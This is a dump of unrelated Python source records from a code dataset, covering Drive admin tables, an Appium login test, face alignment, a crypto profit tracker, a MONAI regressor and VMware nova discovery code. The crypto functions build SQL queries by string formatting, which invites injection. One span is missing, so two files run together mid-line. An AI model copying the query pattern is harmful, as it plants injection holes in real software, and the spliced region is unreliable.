now_naive.replace(tzinfo=timezone.utc)\n if isinstance(t, datetime):\n return t < now\n if type(t) == date:\n end_time = datetime.combine(t, datetime.min.time()) + timedelta(days=1)\n end_time = end_time.replace(tzinfo=timezone.utc)\n return end_time < now\n\n\nclass RecentDocs(ApiTable):\n cols_show = OrderedDict([\n ('title', 'Document'),\n ('date_modified', 'Modified'),\n ('last_user', 'Modified 
by')])\n\n cols_other = ['date_created', 'url', 'icon', 'kind', 'thumb']\n show_n = 20\n\n def refresh_df(self):\n service = SERVICE_HANDLES['files']\n file_fields = (\"files(kind,id,name,webViewLink,iconLink,thumbnailLink,createdTime,\"\n \"modifiedTime,lastModifyingUser/displayName)\")\n collection = service.files()\n cmd = collection.list(corpora='teamDrive',\n includeTeamDriveItems=True,\n orderBy='modifiedTime desc',\n pageSize=20,\n supportsTeamDrives=True,\n teamDriveId=current_app.config['TEAM_DRIVE_ID'],\n fields=file_fields)\n res = cmd.execute()\n files = pd.DataFrame.from_records(res['files'])\n files.lastModifyingUser = files.lastModifyingUser.apply(\n lambda v: v['displayName'] if type(v) == dict else v)\n files.createdTime = files.createdTime.apply(parse_timestamp_str)\n files.modifiedTime = files.modifiedTime.apply(parse_timestamp_str)\n files.rename(columns={'webViewLink': 'url',\n 'thumbnailLink': 'thumb',\n 'iconLink': 'icon',\n 'modifiedTime': 'date_modified',\n 'createdTime': 'date_created',\n 'lastModifyingUser': 'last_user',\n 'name': 'title'\n }, inplace=True)\n # not used: 'id'\n # file_columns = ['title', 'date_modified', 'date_created', 'last_user', 'url', 'icon' , 'kind', 'thumb']\n files = files[self.cols].copy()\n self._df = files\n\n\nclass ReviewTable(ApiTable):\n\n def __init__(self, root_folder_id, root_folder_title):\n self.refresh_minutes = 5\n self.root_folder_id = root_folder_id\n self.root_folder_title = root_folder_title\n super().__init__()\n\n cols_show = OrderedDict([\n ('title', 'Document'),\n ('date_modified', 'Modified'),\n # ('last_user', 'Modified by')\n ])\n cols_other = ['path', 'date_created', 'icon', 'id', 'kind', 'last_user', 'mimeType',\n 'thumb', 'url_content', 'url_view']\n # cols_other = ['date_created', 'url', 'icon', 'kind', 'thumb']\n\n def refresh_df(self):\n files = file_tree_to_df(self.root_folder_id, self.root_folder_title)\n files = files[list(ReviewTable.cols_show) + ReviewTable.cols_other]\n files = files.sort_values(['path', 'title'])\n self._df = files\n","sub_path":"app/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":10130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"582072670","text":"# -*- coding: utf-8 -*-\nimport unittest\nimport HTMLTestRunner\nimport os\nfrom appium import webdriver\nfrom time import sleep\nimport pytest\nimport time\nfrom test.test_decimal import file\nfrom symbol import except_clause\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nclass Dttest(unittest.TestCase):\n \n def __init__(self, methodName='runTest'):\n unittest.TestCase.__init__(self, methodName=methodName)\n \n \n \n def setUp(self):\n print('start setup')\n desired_caps = {}\n desired_caps['platformName'] = 'Android'\n desired_caps['platformVersion'] = '5.1.1'\n #链接设备,使用adb devices命令去查询\n #荣耀7i的版本号是69T7N16719001974\n #华为p9的版本号是PBV7N16719012844\n desired_caps['deviceName'] = '127.0.0.1:62001'\n desired_caps['automationName'] = 'Uiautomator2'\n #通过adb shell logcat|findstr \"Displayed\"\n desired_caps['appPackage'] = 'com.zjmy.eink'\n desired_caps['appActivity'] = '.presenters.activity.login.LoginActivity'\n desired_caps['unicodeKeyboard'] = True\n desired_caps['resetKeyboard'] = True\n #desired_caps['autoGrantPermissions'] = True \n \n #appium链接地址\n self.driver = webdriver.Remote('http://127.0.0.1:4723/wd/hub',desired_caps)\n def 
tearDown(self):\n self.driver.quit()\n print('tearDown')\n \n def test_login_success(self):#用例\n self.always_allow()\n sleep(2)\n self.driver.find_element_by_id(\"com.zjmy.eink:id/input_user\").clear()\n self.driver.find_element_by_id(\"com.zjmy.eink:id/input_user\").send_keys(\"201808\")\n sleep(2)\n self.driver.find_element_by_id(\"com.zjmy.eink:id/input_password\").clear()\n self.driver.find_element_by_id(\"com.zjmy.eink:id/input_password\").send_keys(\"201808\")\n self.driver.find_element_by_id(\"com.zjmy.eink:id/btn_login\").click()\n sleep(3) #3秒登录检测\n \n #点击书城\n self.driver.find_element_by_id(\"com.zjmy.eink:id/ll_tab_menu_bookstore\").click()\n sleep(3)\n #进行搜索\n self.driver.find_element_by_id(\"com.zjmy.eink:id/tv_search\").click()\n sleep(3)\n self.driver.find_element_by_id(\"com.zjmy.eink:id/tv_search\").send_keys(\"格列佛\")\n sleep(3)\n #点击搜索按钮\n self.driver.find_element_by_xpath(\"//*[@resource-id=com.zjmy.eink:id/tv_search][@text='搜索']\")\n #self.driver.find_element_by_link_text(\"搜索\")\n sleep(3)\n #点击这本书\n self.driver.flick(40, 308, 279, 740)\n sleep(6)\n \n \n \n def always_allow(self):\n for i in range(3):\n #toast_loc = (\"xpath\", \".//*[contains(@text,'%s')]\"%text)\n loc = (\"xpath\", \".//*[contains(@text,'始终允许')]\")\n try:\n e = WebDriverWait(self.driver, 1, 0.5).until(EC.presence_of_element_located(loc))\n e.click()\n except:\n pass \n \nif __name__ == '__main__':\n suite = unittest.TestSuite()#创建一个测试集合\n #需要测试的用例就addTest,不加的就不会运行\n #suite.addTest(Dttest('test_login_success'))\n suite.addTest(Dttest('test_login_failer'))\n #unittest.TextTestRunner(verbosity=1).run(suite)\n #timestr = time.strftime('%Y-%m-%d %X',time.localtime(time.time()))#本地日期时间作为测试报告的名字\n \n filename = 'D:\\\\appium\\\\report1.html'#这个路径改成自己的目录路径\n fp = open(filename,'wb')\n runner = HTMLTestRunner.HTMLTestRunner(\n stream=fp,\n title='result',\n description='report'\n )\n \n runner.run(suite)\n fp.close()\n ","sub_path":"sxreader_appium_student/com/zjmy/sxreader/testAppium.py","file_name":"testAppium.py","file_ext":"py","file_size_in_byte":3849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"27241255","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon May 01 05:18:38 2017\n\n@author: zhaoy\n\"\"\"\n\nimport numpy as np\nimport cv2\nimport json\nimport os\nimport os.path as osp\n\n#from matplotlib import pyplot as plt\nimport _init_paths\nfrom fx_warp_and_crop_face import get_reference_facial_points, warp_and_crop_face, FaceWarpException\n\nGT_RECT = [68, 68, 182, 182]\nGT_AREA = (GT_RECT[2] - GT_RECT[0] + 1) * (GT_RECT[3] - GT_RECT[1] + 1)\noverlap_thresh = 0.3\n\nonly_align_missed = False\ndo_align = True\ndefault_square = True\npadding_factor = 0.25\nouter_padding = (0, 0)\noutput_size = (224, 224)\n\nreference_5pts = get_reference_facial_points(\n output_size, padding_factor, outer_padding, default_square)\n\n\nlandmark_fn = r'../landmark_yrj_8imgs_wrong_correct_new_format.json'\nimg_root_dir = r'C:/zyf/dataset/webface/CASIA-maxpy-clean'\n#landmark_fn = r'../../../webface-mtcnn-fd-rlt/landmark_correct_new_format_add_missed.json'\n#img_root_dir = r'/disk2/data/FACE/webface/CASIA-maxpy-clean'\naligned_save_dir = img_root_dir + '_mtcnn_simaligned_224x224_for_vggface'\n\nlog_fn1 = 'align_succeeded_list.txt'\nlog_fn2 = 'align_failed_list.txt'\nlog_fn3 = 'faces_wrong_max_score_idx_list.txt'\n\nlog_align_params = 'align_params.txt'\n\n\ndef get_gt_overlap(faces):\n rects = [it['rect'] for it in faces]\n\n rects_arr = 
np.array(rects)\n# print 'rects_arr: {}'.format(rects_arr)\n area = (rects_arr[:, 2] - rects_arr[:, 0] + 1) * \\\n (rects_arr[:, 3] - rects_arr[:, 1] + 1)\n# print 'area: {}'.format(area)\n\n o_x1 = np.maximum(GT_RECT[0], rects_arr[:, 0])\n o_x2 = np.minimum(GT_RECT[2], rects_arr[:, 2])\n o_y1 = np.maximum(GT_RECT[1], rects_arr[:, 1])\n o_y2 = np.minimum(GT_RECT[3], rects_arr[:, 3])\n\n o_w = np.maximum(0, o_x2 - o_x1 + 1)\n o_h = np.maximum(0, o_y2 - o_y1 + 1)\n\n overlap = o_w * o_h\n# print 'overlap area: {}'.format(overlap)\n\n overlap = overlap / (GT_AREA + area - overlap)\n# print 'overlap ratio: {}'.format(overlap)\n\n return overlap\n\n\ndef get_max_gt_overlap_face(faces, thresh=0.5):\n overlap = get_gt_overlap(faces)\n\n max_id = overlap.argmax()\n# print 'overlap[max_id]: %1.3f' % overlap[max_id]\n if overlap[max_id] >= thresh:\n return max_id\n else:\n return -1\nfp_in = open(landmark_fn, 'r')\nimg_list = json.load(fp_in)\nfp_in.close()\n\nif only_align_missed:\n print('Only process missed faces!!!')\n\nif not osp.exists(img_root_dir):\n print('ERROR: webface root dir not found!!!')\n\nelse:\n if not osp.exists(aligned_save_dir):\n print('mkdir for aligned faces, aligned root dir: ', aligned_save_dir)\n os.makedirs(aligned_save_dir)\n\n# fp_log_params = open(osp.join(aligned_save_dir, log_align_params), 'w')\n# params_template = '''\n## default_square = {}\n## padding_factor = {}\n## outer_padding = {}\n## output_size = {}\n# '''\n# params_template = ('default_square = {}\\n'\n# 'padding_factor = {}\\n'\n# 'outer_padding = {}\\n'\n# 'output_size = {}\\n')\n#\n# fp_log_params.write(params_template.format(\n# default_square, padding_factor,\n# outer_padding, output_size)\n# )\n# fp_log_params.close()\n\n fp_log1 = open(osp.join(aligned_save_dir, log_fn1), 'w')\n fp_log2 = open(osp.join(aligned_save_dir, log_fn2), 'w')\n fp_log3 = open(osp.join(aligned_save_dir, log_fn3), 'w')\n\n# imgSize = [112, 96];\n# coord5points = [[30.2946, 65.5318, 48.0252, 33.5493, 62.7299],\n# [51.6963, 51.5014, 71.7366, 92.3655, 92.2041]];\n# pts_dst = np.float32(coord5points).transpose()\n\n failed_count1 = 0\n failed_count2 = 0\n\n for item in img_list:\n err_msg = ''\n if 'filename' not in item:\n err_msg = \"'filename' not in item, break...\"\n print(err_msg)\n fp_log2.write(err_msg + '\\n')\n break\n\n img_fn = osp.join(img_root_dir, item['filename'])\n save_fn = osp.join(aligned_save_dir, item['filename'])\n save_fn_dir = osp.dirname(save_fn)\n\n print('===> Processing image: ' + img_fn)\n\n if 'faces' not in item:\n err_msg = \"'faces' not in item\"\n fp_log2.write(item['filename'] + ': ' + err_msg + '\\n')\n continue\n elif 'face_count' not in item:\n err_msg = \"'face_count' not in item\"\n fp_log2.write(item['filename'] + ': ' + err_msg + '\\n')\n continue\n\n if only_align_missed and 'used_gt' not in item:\n print('skipped because only_align_missed')\n continue\n\n\n if do_align and not osp.exists(save_fn_dir):\n os.makedirs(save_fn_dir)\n\n nfaces = item['face_count']\n\n if nfaces < 1:\n fp_log2.write(item['filename'] + ': ' +\n \"item['face_count'] < 1\" + '\\n')\n continue\n\n if nfaces != len(item['faces']):\n fp_log2.write(item['filename'] + ': ' +\n \"item['face_count'] != len(item['faces']\" + '\\n')\n continue\n\n faces = item['faces']\n scores = np.array([it['score'] for it in faces])\n max_score_idx = scores.argmax()\n\n# max_score_idx = 0\n#\n# if nfaces > 1:\n# for idx in range(1, nfaces):\n# if faces[idx]['score'] > faces[max_score_idx]['score']:\n# max_score_idx = idx\n\n 
overlaps = get_gt_overlap(faces)\n\n max_overlap_idx = overlaps.argmax()\n\n if max_score_idx != max_overlap_idx:\n fp_log3.write(item['filename'] + ': ' + '\\n')\n fp_log3.write(\"--> max_score_idx = {}\\n\".format(max_score_idx))\n fp_log3.write(\"--> max_overlap_idx = {}\\n\".format(max_overlap_idx))\n fp_log3.write(\"--> scores = {}\\n\".format(scores))\n fp_log3.write(\"--> overlaps = {}\\n\".format(overlaps))\n\n if overlaps[max_overlap_idx] >= overlap_thresh:\n fp_log1.write(item['filename'] + ': ' + \" max_overlap_idx=\"\n + str(max_overlap_idx) + '\\n')\n if do_align:\n points = np.array(faces[max_overlap_idx]['pts'])\n facial5points = np.reshape(points, (2, -1))\n # print facial5points\n\n try:\n image = cv2.imread(img_fn, True)\n\n dst_img = warp_and_crop_face(\n image, facial5points, reference_5pts, output_size)\n cv2.imwrite(save_fn, dst_img)\n except Exception as e:\n failed_count1 += 1\n fp_log2.write(item['filename'] + ': ' +\n \"exception when loading image\"\n \" or aligning faces or saving results\" + '\\n')\n fp_log2.write(\"\\texception: {}\".format(e) + '\\n')\n continue\n\n fp_log1.write(item['filename'] + ': ' +\n \" succeeded to align\" + '\\n')\n else:\n failed_count2 += 1\n\n fp_log2.write(item['filename'] + ': ' +\n \"no faces have overlap>={} with groundtruth\".format(\n overlap_thresh) +\n '\\n')\n fp_log2.write(\"--> max_score_idx = {}\\n\".format(max_score_idx))\n fp_log2.write(\"--> max_overlap_idx = {}\\n\".format(max_overlap_idx))\n fp_log2.write(\"--> scores = {}\\n\".format(scores))\n fp_log2.write(\"--> overlaps = {}\\n\".format(overlaps))\n\n fp_log2.write(\"\\n==>Faied images: {}\\n\".format(failed_count1\n + failed_count2))\n fp_log2.write(\"\\t{} failed because of exception\\n\".format(failed_count1))\n fp_log2.write(\"\\t{} failed because of max_overlap 0:\n return (\" You are in profit of {:.1f} dollars \".format(usdProfLossPrice))\n else:\n return (\"Sorry, you are in loss of {:.1f}\".format(usdProfLossPrice))\n\n\ndef quantity(coinName): # it gives the available quantity of a coin\n coinName = coinName + \"BTC\"\n data = c.execute(\"\"\"\n SELECT sum(Amount)\n FROM coinsXaction\n WHERE Market = \"{}\"\n \"\"\".format(coinName))\n for line in data:\n qty = int(line[0])\n if qty == 0:\n return (\"you sold all your {} coin\".format(coinName))\n else:\n return (\" You've got {} {} coin\".format(qty, coinName))\n break\n","sub_path":"processUnit.py","file_name":"processUnit.py","file_ext":"py","file_size_in_byte":3967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"263030249","text":"# Copyright 2020 MONAI Consortium\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# http://www.apache.org/licenses/LICENSE-2.0\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom typing import Optional, Sequence, Union\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\n\nfrom monai.networks.blocks import Convolution, ResidualUnit\nfrom monai.networks.layers.convutils import calculate_out_shape, same_padding\nfrom monai.networks.layers.factories import Act, Norm\nfrom monai.networks.layers.simplelayers 
import Reshape\nfrom monai.utils import ensure_tuple, ensure_tuple_rep\n\n\nclass Regressor(nn.Module):\n \"\"\"\n This defines a network for relating large-sized input tensors to small output tensors, ie. regressing large\n values to a prediction. An output of a single dimension can be used as value regression or multi-label\n classification prediction, an output of a single value can be used as a discriminator or critic prediction.\n \"\"\"\n\n def __init__(\n self,\n in_shape: Sequence[int],\n out_shape: Sequence[int],\n channels: Sequence[int],\n strides: Sequence[int],\n kernel_size: Union[Sequence[int], int] = 3,\n num_res_units: int = 2,\n act=Act.PRELU,\n norm=Norm.INSTANCE,\n dropout: Optional[float] = None,\n bias: bool = True,\n ) -> None:\n \"\"\"\n Construct the regressor network with the number of layers defined by `channels` and `strides`. Inputs are\n first passed through the convolutional layers in the forward pass, the output from this is then pass\n through a fully connected layer to relate them to the final output tensor.\n\n Args:\n in_shape: tuple of integers stating the dimension of the input tensor (minus batch dimension)\n out_shape: tuple of integers stating the dimension of the final output tensor\n channels: tuple of integers stating the output channels of each convolutional layer\n strides: tuple of integers stating the stride (downscale factor) of each convolutional layer\n kernel_size: integer or tuple of integers stating size of convolutional kernels\n num_res_units: integer stating number of convolutions in residual units, 0 means no residual units\n act: name or type defining activation layers\n norm: name or type defining normalization layers\n dropout: optional float value in range [0, 1] stating dropout probability for layers, None for no dropout\n bias: boolean stating if convolution layers should have a bias component\n \"\"\"\n super().__init__()\n\n self.in_channels, *self.in_shape = ensure_tuple(in_shape)\n self.dimensions = len(self.in_shape)\n self.channels = ensure_tuple(channels)\n self.strides = ensure_tuple(strides)\n self.out_shape = ensure_tuple(out_shape)\n self.kernel_size = ensure_tuple_rep(kernel_size, self.dimensions)\n self.num_res_units = num_res_units\n self.act = act\n self.norm = norm\n self.dropout = dropout\n self.bias = bias\n self.net = nn.Sequential()\n\n echannel = self.in_channels\n\n padding = same_padding(kernel_size)\n\n self.final_size = np.asarray(self.in_shape, np.int)\n self.reshape = Reshape(*self.out_shape)\n\n # encode stage\n for i, (c, s) in enumerate(zip(self.channels, self.strides)):\n layer = self._get_layer(echannel, c, s, i == len(channels) - 1)\n echannel = c # use the output channel number as the input for the next loop\n self.net.add_module(\"layer_%i\" % i, layer)\n self.final_size = calculate_out_shape(self.final_size, kernel_size, s, padding)\n\n self.final = self._get_final_layer((echannel,) + self.final_size)\n\n def _get_layer(\n self, in_channels: int, out_channels: int, strides: int, is_last: bool\n ) -> Union[ResidualUnit, Convolution]:\n \"\"\"\n Returns a layer accepting inputs with `in_channels` number of channels and producing outputs of `out_channels`\n number of channels. The `strides` indicates downsampling factor, ie. convolutional stride. 
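A stride of 2, for example, roughly halves each spatial dimension of the feature map produced by the layer.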
If `is_last`\n is True this is the final layer and is not expected to include activation and normalization layers.\n \"\"\"\n\n layer: Union[ResidualUnit, Convolution]\n\n if self.num_res_units > 0:\n layer = ResidualUnit(\n subunits=self.num_res_units,\n last_conv_only=is_last,\n dimensions=self.dimensions,\n in_channels=in_channels,\n out_channels=out_channels,\n strides=strides,\n kernel_size=self.kernel_size,\n act=self.act,\n norm=self.norm,\n dropout=self.dropout,\n bias=self.bias,\n )\n else:\n layer = Convolution(\n conv_only=is_last,\n dimensions=self.dimensions,\n in_channels=in_channels,\n out_channels=out_channels,\n strides=strides,\n kernel_size=self.kernel_size,\n act=self.act,\n norm=self.norm,\n dropout=self.dropout,\n bias=self.bias,\n )\n\n return layer\n\n def _get_final_layer(self, in_shape: Sequence[int]):\n linear = nn.Linear(int(np.product(in_shape)), int(np.product(self.out_shape)))\n return nn.Sequential(nn.Flatten(), linear)\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n x = self.net(x)\n x = self.final(x)\n x = self.reshape(x)\n return x\n","sub_path":"monai/networks/nets/regressor.py","file_name":"regressor.py","file_ext":"py","file_size_in_byte":6080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"333696869","text":"# vim: tabstop=6 shiftwidth=4 softtabstop=4\n# Copyright (c) 2014 Platform9 Systems Inc.\n\n\"\"\"\nImplements get_instance_info and related functions which are used in\ninstance discovery for vmware ESX/vCenter\n\"\"\"\nfrom datetime import timedelta, datetime\nfrom oslo_vmware import exceptions as vexc\nfrom oslo_config import cfg\nfrom netaddr import IPAddress\nfrom nova import exception\nfrom oslo_log import log as logging\nfrom oslo_vmware import vim_util as oslo_vutil\nfrom nova.virt.vmwareapi import constants\nfrom nova.virt.vmwareapi import vim_util\nfrom nova.virt.vmwareapi import vm_util\nfrom nova.compute import power_state\nfrom nova.virt import resource_types\nfrom nova.virt.vmwareapi import vm_queries_pf9\n\nimport nova.virt\nimport vmops\nimport host_statistics_pf9\n\npf9_opts_group = cfg.OptGroup(name='PF9')\npf9_opts = [\n cfg.StrOpt(name='ignore_folders', default='pf9_cinder_volumes',\n help='All VMs under the specified folders will only be logged '\n 'and not reported. Comma separated value.')\n]\n\nCONF = cfg.CONF\nCONF.register_group(pf9_opts_group)\nCONF.register_opts(pf9_opts, group=pf9_opts_group)\n\n\nLOG = logging.getLogger(__name__)\n\n# local cache of uuid->vm_ref\n# Reason for keeping this cache in this file and not in driver is to make this\n# cache accessible to calls from vmops.py\n_vm_cache = dict()\n_cache_refresh_interval = timedelta(minutes=10)\n_last_cache_clear_time = None\n\n# partial discovery IAAS-3987:\n# for get_network_information_from_vcenter. 
This is cached as the function\n# may be called as often as once per minute, straining vCenter.\n_network_vm_cache = None\n\nchange_units = {\n # CPU and memory usage percentages are already in correct format\n resource_types.CPU: lambda val: val,\n resource_types.MEMORY: lambda val: val,\n\n # Total packets send in 1000s of packets\n resource_types.NETWORK_SENT_PKTS: lambda val: val / 1000.0,\n resource_types.NETWORK_RECV_PKTS: lambda val: val / 1000.0,\n\n # network rates reported as KBPS, converting to MBPS\n resource_types.NETWORK_SEND_RATE: lambda val: val / 1000.0,\n resource_types.NETWORK_RECV_RATE: lambda val: val / 1000.0,\n\n # Disk capacity reported in bytes, converting to GB\n resource_types.DISK_USED: lambda val: 1.0 * val / 1024 ** 3,\n resource_types.DISK_TOTAL: lambda val: 1.0 * val / 1024 ** 3\n}\n\nvmware_to_resource_type = {\n 'mem.usage.average': resource_types.MEMORY,\n 'cpu.usage.average': resource_types.CPU,\n 'net.received.average': resource_types.NETWORK_RECV_RATE,\n 'net.transmitted.average': resource_types.NETWORK_SEND_RATE,\n 'net.packetsRx.summation': resource_types.NETWORK_RECV_PKTS,\n 'net.packetsTx.summation': resource_types.NETWORK_SENT_PKTS,\n 'disk.usage': resource_types.DISK_USED,\n 'disk.capacity': resource_types.DISK_TOTAL\n}\n\nresource_type_to_vmware = {\n resource_types.MEMORY: 'mem.usage.average',\n resource_types.CPU: 'cpu.usage.average',\n resource_types.NETWORK_RECV_RATE: 'net.received.average',\n resource_types.NETWORK_SEND_RATE: 'net.transmitted.average',\n resource_types.NETWORK_RECV_PKTS: 'net.packetsRx.summation',\n resource_types.NETWORK_SENT_PKTS: 'net.packetsTx.summation',\n resource_types.DISK_USED: 'disk.usage',\n resource_types.DISK_TOTAL: 'disk.capacity'\n}\n\nresources_available_at_respool = [\n resource_types.CPU,\n resource_types.MEMORY\n]\n\n\ndef get_hostname(driver):\n host_objs = driver._session._call_method(vim_util, \"get_objects\",\n \"HostSystem\", [\"name\"])\n host = None\n if host_objs:\n for host_obj in host_objs.objects:\n host = host_obj.obj\n break\n\n return driver._session._call_method(oslo_vutil, \"get_object_property\",\n host, \"name\")\n\n\ndef get_all_ip_addr(driver):\n return [{'interface_name': \"vCenter IP\",\n 'ip': driver._host_ip}]\n\n\ndef get_host_stats_esx(driver, res_types):\n \"\"\"\n Return currently known physical resource consumption\n :param res_types: An array of resources to be queried\n \"\"\"\n res_to_be_queried = [resource_type_to_vmware[x] for x in res_types]\n\n host_objs = driver._session._call_method(vim_util, \"get_objects\",\n \"HostSystem\", [\"name\"])\n # ESX will have only 1 host\n host = host_objs.objects[0].obj\n\n # Get information from all performance counters\n reqd_counter_information = driver._session._call_method(\n vim_util, \"get_esx_properties_pf9\", host, res_to_be_queried, None)\n return _get_stats_from_vmw_stats(reqd_counter_information)\n\n\ndef get_host_stats_vc(driver, res_types, node_name):\n \"\"\"\n Return aggregated stats for the given node (cluster)\n \"\"\"\n cluster_mor = driver._cluster_ref\n data_store_refs = _get_datastores_for_cluster(driver, cluster_mor, driver._datastore_regex)\n\n # Commenting the code so as to make sure we remove get_vc_properties_pf9\n # from vim_util when cleaning up this file as a part of IAAS-1778\n # get hosts under the VC\n #hosts = []\n #host_objs = driver._session._call_method(vim_util, \"get_objects\",\n # \"HostSystem\", [\"name\"])\n #for host_obj in host_objs.objects:\n # hosts.append(host_obj.obj)\n\n #vc_stats = 
driver._session._call_method(\n # vim_util, \"get_vc_properties_pf9\", res_pools, data_store_refs, hosts, res_types, None)\n\n vc_stats = {}\n # Net stats are not being used currently, also we are currently avoiding\n # the use of performance manager to get network stats since it is quite\n # resource and time consuming.\n # TODO: Revisit the performance manager logic to fetch network statistics\n # FIXME: IAAS-1875\n vc_stats['net.transmitted.average'] = 0\n vc_stats['net.received.average'] = 0\n vc_stats['net.packetsRx.summation'] = 0\n vc_stats['net.packetsTx.summation'] = 0\n datastore_stats = host_statistics_pf9.get_datastore_usage_stats(\n driver._session, data_store_refs)\n cluster_stats = host_statistics_pf9.get_cluster_usage_and_percentage(\n driver._session, cluster_mor)\n vc_stats['cpu.usage.average'] = 0 if cluster_stats['total_cpu'] == 0 else \\\n cluster_stats['used_cpu'] * 100.0 / cluster_stats['total_cpu']\n vc_stats['mem.usage.average'] = 0 if cluster_stats['total_memory'] == 0 else \\\n cluster_stats['used_memory'] * 100.0 / cluster_stats['total_memory']\n vc_stats['disk.capacity'] = datastore_stats['total_capacity']\n vc_stats['disk.usage'] = datastore_stats['total_used']\n\n return _get_stats_from_vmw_stats(vc_stats)\n\n\ndef _get_stats_from_vmw_stats(stats):\n keys = stats.keys()\n return_stats = dict()\n for key in keys:\n val = stats.get(key)\n return_stats[vmware_to_resource_type[key]] = \\\n _get_avg(vmware_to_resource_type[key], val)\n return return_stats\n\n\ndef _get_avg(key, values):\n if not isinstance(values, list):\n values = [values]\n total = sum(values)\n total = 1.0 * total / len(values)\n return change_units[key](total)\n\n\ndef get_all_networks(driver):\n \"\"\"\n Gets a mapping of IP addresses, MAC addresses and networks connected\n \"\"\"\n network_list = []\n datacenter_refs = []\n all_networks = []\n datacenters = driver._session._call_method(\n vim_util, \"get_objects\", \"Datacenter\", [\"name\"])\n for datacenter in datacenters.objects:\n datacenter_refs.append(datacenter.obj)\n\n for datacenter_ref in datacenter_refs:\n all_networks.append(driver._session._call_method(\n oslo_vutil, \"get_object_property\",\n datacenter_ref, \"network\"))\n\n for dc_specific_network in all_networks:\n # In cases where the datacenter has no networks, the previous driver call returns\n # an empty array element. 
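(so indexing it with [0] below raises IndexError).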
Wrap in try-catch to allow for such cases, and continue\n try:\n for network in dc_specific_network[0]:\n if network['_type'] == \"Network\":\n network_name = driver._session._call_method(\n oslo_vutil, \"get_object_property\",\n network, \"name\")\n #TODO: network uuid needs to maintained along with names to\n # differentiate between them\n if {'bridge': network_name} not in network_list:\n network_list.append({'bridge': network_name})\n else:\n LOG.info(\"Ignoring network having [%s] type\" %\n network['_type'])\n except IndexError:\n LOG.info(\"Encountered a datacenter with no associated network, ignoring\")\n\n return network_list\n\n\ndef get_all_cluster_networks(driver, node=None):\n \"\"\"\n Gets a list of all networks connected to the authorized clusters\n \"\"\"\n network_moids = set()\n network_list = []\n\n assert isinstance(driver, nova.virt.vmwareapi.VMwareVCDriver)\n\n cluster_mors = [driver._cluster_ref]\n for cluster_mor in cluster_mors:\n network_mors = driver._session._call_method(oslo_vutil,\n \"get_object_property\",\n cluster_mor, \"network\")\n if not network_mors:\n LOG.warn(\"No networks detected under {cls_mor} cluster\".format(\n cls_mor=str(cluster_mor)))\n return network_list\n for network_mor in network_mors.ManagedObjectReference:\n if not network_mor.value in network_moids:\n network_moids.add(network_mor.value)\n network_name = driver._session._call_method(\n oslo_vutil, \"get_object_property\",\n network_mor, \"name\")\n network_list.append({'bridge': network_name})\n\n return network_list\n\n\n# NOT USED\ndef get_all_ip_mappings(driver):\n vm_network_info = dict()\n all_vms = _get_vms_and_uuids(driver)\n vm_id_ref = dict()\n\n for vm in all_vms.objects:\n for prop in vm.propSet:\n if prop.name == \"summary.config.instanceUuid\":\n vm_id_ref[prop.val] = vm.obj\n\n for (uuid, vm_ref) in vm_id_ref.items():\n # TODO: IAAS-763\n guest_nics_info = driver._session._call_method(\n oslo_vutil, \"get_object_property\", vm_ref, \"guest.net\")\n if guest_nics_info:\n for nic_info in guest_nics_info.GuestNicInfo:\n ip_addresses = nic_info['ipAddress'] \\\n if hasattr(nic_info, 'ipAddress') else None\n mac_address = nic_info['macAddress'] \\\n if hasattr(nic_info, 'macAddress')else None\n network_name = nic_info['network'] \\\n if hasattr(nic_info, 'network') else None\n if not vm_network_info.get(uuid):\n vm_network_info[uuid] = []\n # select ipv4 if available, otherwise select first ip present\n ip_address = None\n if ip_addresses is not None:\n for ip in ip_addresses:\n if ip.find(\":\") == -1:\n ip_address = ip\n break\n if ip_address is None:\n ip_address = ip_addresses[0]\n\n vm_network_info[uuid].append({'ip_address': ip_address,\n 'mac_address': mac_address,\n 'bridge': network_name})\n else:\n vm_network_info[uuid] = []\n return vm_network_info\n\n\ndef get_vms_on_vcenter(driver, node=None):\n \"\"\"\n Generator for getting all VMs that are of interest to the driver.\n The VMs returned by this method are already filtered based on datastore and\n cluster they belong to.\n The VM object returned contains the vm ref alongwith following properties -\n 1. name\n 2. runtime.connectionState\n 3. summary.config.vmPathName\n 4. summary.config.instanceUuid\n 5. resourcePool\n 6. parent\n How to use this function for getting other properties -\n for vm in get_all_vms_on_vcenter(driver):\n vm_ref = vm.obj\n # Use vm_ref to call get_dynamic_properties and\n # get other properties as needed\n Note:\n 1. This method will return templates as well\n 2. 
to get properties listed above you need to iterate over vm.propSet\n 3. This method will return **NOT** any VM that are under the folders\n specified in ignore_folders in nova.conf\n \"\"\"\n global _vm_cache\n folder_ref_name = dict()\n res_pools_to_look_for = [x.value for x in vm_queries_pf9._get_res_pool_obj_list(driver, node)]\n folders_to_ignore = [x.strip() for x in CONF.PF9.ignore_folders.split(',')]\n for vm in vm_queries_pf9._get_all_vms(driver):\n uuid = None\n conn_state = None\n datastore = None\n vm_path = None\n resource_pool = None\n folder_ref = None\n vm_name = None\n for prop in vm.propSet:\n if prop.name == \"runtime.connectionState\":\n conn_state = prop.val\n elif prop.name == 'summary.config.vmPathName':\n vm_path = prop.val\n datastore = vm_path[vm_path.find('[')+1:vm_path.find(']')]\n elif prop.name == \"resourcePool\":\n resource_pool = prop.val.value\n elif prop.name == 'summary.config.instanceUuid':\n uuid = prop.val\n elif prop.name == 'parent':\n folder_ref = prop.val\n elif prop.name == 'name':\n vm_name = prop.val\n\n if folder_ref not in folder_ref_name:\n folder_ref_name[folder_ref] = driver._session._call_method(\n 